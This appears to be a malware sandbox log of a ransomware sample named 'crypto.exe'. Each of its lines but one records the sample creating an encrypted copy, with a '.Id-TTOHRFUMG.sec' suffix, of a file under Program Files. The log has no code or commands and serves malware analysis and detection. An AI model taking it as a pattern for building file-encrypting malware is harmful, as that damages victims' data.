File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187819.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0304405.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\EmbeddedView.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PROOF\MSSP7FR.dub.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_output\libcaca_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows NT\Accessories\WordpadFilter.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02028K.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD15155_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\misc\libexport_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)notConnectedStateIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\button_mid_over.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\ENVELOPE.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19828_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18194_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD10219_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OUTLOOK_COL.HXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01126_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\mlib_image.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14982_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR19F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_OliveGreen.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrowMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\misc\libxml_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows NT\Accessories\en-US\wordpad.exe.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainToNotesBackground.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Volgograd.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0086478.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\PS9CRNRH.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\SAEXT.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\tnameserv.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Dawson_Creek.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\Discussion14.gta.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\Network Sharing\wmpnss_bw32.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\graph_up.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl.bat.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\STSLIST.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\requests\status.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\gui\libskins2_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PPCORE.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.filetransfer_5.0.0.v20140827-1444.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107148.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00466_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Technic.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-down.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\diner.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_snow.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\fontconfig.properties.src.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-cli.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Indian\Maldives.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME46.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\BANNER.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\meta\art\03_lastfm.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Photo Viewer\PhotoViewer.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_h.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_single.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\El_Salvador.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00633_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285484.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341551.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libg711_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\uninstall.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_nl.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\mset7tk.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00445_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00734_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR35F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\WINWORD.DEV_COL.HXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\greenStateIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Phoenix.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10335_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00629_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\TALK21.COM.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\misc\libstats_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01152_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_LightSpirit.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\OriginMergeFax.Dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\js\settings.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Tegucigalpa.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178632.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200383.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MEDIA\HAMMER.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libscene_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Lindeman.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\MUSIC_01.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CSS7DATA000C.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\FeedSync.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\ParentMenuButtonIconSubpict.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services_1.1.0.v20140328-1925.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0230558.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\js\clock.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\dt.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0286034.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0295241.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15059_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN109.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libpva_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_left_mouseover.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Omsk.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\SystemV\CST6.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107488.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107490.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00438_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Media Player\Media Renderer\DMR_48.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\system_s.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunmscapi.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net_1.2.200.v20120807-0927.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OUTFORM.DAT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\stream_window.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\SendMail.api.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.annotation_1.2.0.v201401042248.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightOrange\tab_off.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ZoomIconsMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\Filters.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Oasis\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01562U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Grid.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR44F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_dot.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\logo.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-first-quarter.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.ja_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiler.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Africa\Monrovia.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00158_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE06049_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0183328.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\J0115875.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Moncton.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\spu\libremoteosd_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\FOLDPROJ.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01176_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR27F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\jstack.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\SECRECS.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue\HEADER.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME38.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OUTLOOK.HXS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FORM.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\settings.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_s.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Zaporozhye.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-actions.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\images\cursors\invalid32x32.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Nicosia.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01183_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107264.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\VelvetRose.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\chapters-static.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\en-GB.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_ja.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-sampler.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00610_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Black Tie.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\BHOINTL.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR7F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTAREA.JPG.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\toc.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMaskRTL.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_down_BIDI.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\viewDblClick.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIcons.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\WEBHED98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\flower.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD15302_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02127_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10337_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\sqlceoledb35.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\setup_wm.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_down_BIDI.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_sv.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Samara.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PROOF\MSTH7ES.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-stdio-l1-1-0.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\icon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Indianapolis.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\La_Paz.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0183174.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0186362.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_rest.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Buenos_Aires.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Slate\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\TipsImageMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsColorChart.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\msolui100.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Nipigon.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21303_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\sd\icecast.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\sl.txt.Id-TTOHRFUMG.sec	crypto.exe
